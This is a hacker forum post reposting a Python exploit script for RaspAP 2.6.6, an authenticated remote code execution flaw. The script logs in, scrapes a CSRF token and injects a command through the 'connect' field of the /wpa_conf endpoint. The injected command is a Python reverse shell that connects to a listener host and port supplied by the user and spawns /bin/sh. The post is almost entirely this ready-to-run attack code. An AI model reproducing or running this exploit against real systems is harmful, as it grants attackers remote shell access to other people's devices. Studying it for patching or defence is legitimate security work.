跳转到帖子
  • 游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

    赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

    TheHackerWorld官方

RaspAP 2.6.6 - Remote Code Execution (RCE) (Authenticated)


HACK1949

推荐的帖子

# Exploit Title: RaspAP 2.6.6 - Remote Code Execution (RCE) (Authenticated)
# Date: 23.08.2021
# Exploit Author: Moritz Gruber <moritz@aware7.de>
# Vendor Homepage: https://raspap.com/
# Software Link: https://github.com/RaspAP/raspap-webgui
# Version: 2.6.6
# Tested on: Linux raspberrypi 5.10.52-v7+

import requests
from requests.api import post
from requests.auth import HTTPBasicAuth
from bs4 import BeautifulSoup
import sys, re

if len(sys.argv) != 7:
    print("python3 exec-raspap.py <target-host> <target-port> <username> <password> <reverse-host> <reverse-port>")
    sys.exit()
else:  
    target_host = sys.argv[1]
    target_port = sys.argv[2]
    username = sys.argv[3]
    password = sys.argv[4]
    listener_host = sys.argv[5]
    listener_port = sys.argv[6]

    endpoint = "/wpa_conf"
    exploit = f"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{listener_host}\",{listener_port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
    url = "http://{}:{}/{}".format(target_host,target_port,endpoint)

    s = requests.Session()

    get_Request = s.get(url, auth=HTTPBasicAuth(username, password))
    soup = BeautifulSoup(get_Request.text, "lxml")
    csrf_token = soup.find("meta",{"name":"csrf_token"}).get("content")
   
    post_data = {
        "csrf_token": csrf_token,
        "connect": "wlan; {}".format(exploit)
    }
    post_Request = s.post(url, data=post_data, auth=HTTPBasicAuth(username, password))
    if post_Request.status_code:
        print("Exploit send.")
    else:
        print("Something went wrong.")
    print("Done")
            
链接帖子
意见的链接
分享到其他网站

黑客攻防讨论组

黑客攻防讨论组

    You don't have permission to chat.
    • 最近浏览   0位会员

      • 没有会员查看此页面。
    ×
    ×
    • 创建新的...